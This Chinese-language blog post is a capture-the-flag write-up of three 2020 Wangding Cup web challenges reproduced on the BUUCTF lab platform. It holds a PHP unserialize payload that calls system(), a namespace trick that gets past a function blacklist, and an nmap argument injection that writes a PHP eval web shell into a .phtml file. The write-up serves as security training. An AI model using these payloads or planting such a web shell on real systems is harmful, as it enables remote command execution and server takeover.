[网鼎杯 2020 朱雀组]WEB 复现

/ 0评 / 0

BUU很快上了复现环境,来尝试坐下

[网鼎杯 2020 朱雀组]phpweb

打开靶机是一张懒狗图
查看源码发现

发现是类似与xxx(xxx)的参数,抓包随便改动一下出现了报警

发现是一个call_user_func
所以尝试构造一下函数读一下源码
额编辑器又抽风了,所以随便贴下

源码审计后可以发现过滤了很多关键的系统函数
传入参数func与p,如果func不为空且不再黑名单内,调用gettime函数,然后传入call_user_func创建用户函数,并用gettype判断函数类型,如果是string就返回结果。
有一个test类,有_destruct魔法函数
然后没过滤unserialize函数,根据刚刚的经验。直接赋值给func和p函数直接打进去就行
O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}
有非预期解
用命名空间直接执行system函数
func=\system&p=ls /
发现flag不在根目录
找一下 func=\system&p=find / -name flag 在tmp目录 直接读


[网鼎杯 2020 朱雀组]Nmap

测了一会儿也没啥思路,以为是ssrf但是也不太像。。。
之后发现是BUUCTF 2018 Online Tool的类似题
直接payload拿来用。发现返回了hack。测一手过滤了php以及一些常用php后缀。但没过滤phtml
那不用php呗。短标签+phtml
host=' <? @eval($_POST["hack"]);?> -oG 1.phtml '
会转圈,但是直接访问 shell是写进去了。


[网鼎杯 2020 朱雀组]Think Java

java题,给了附件。尝试做一下

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注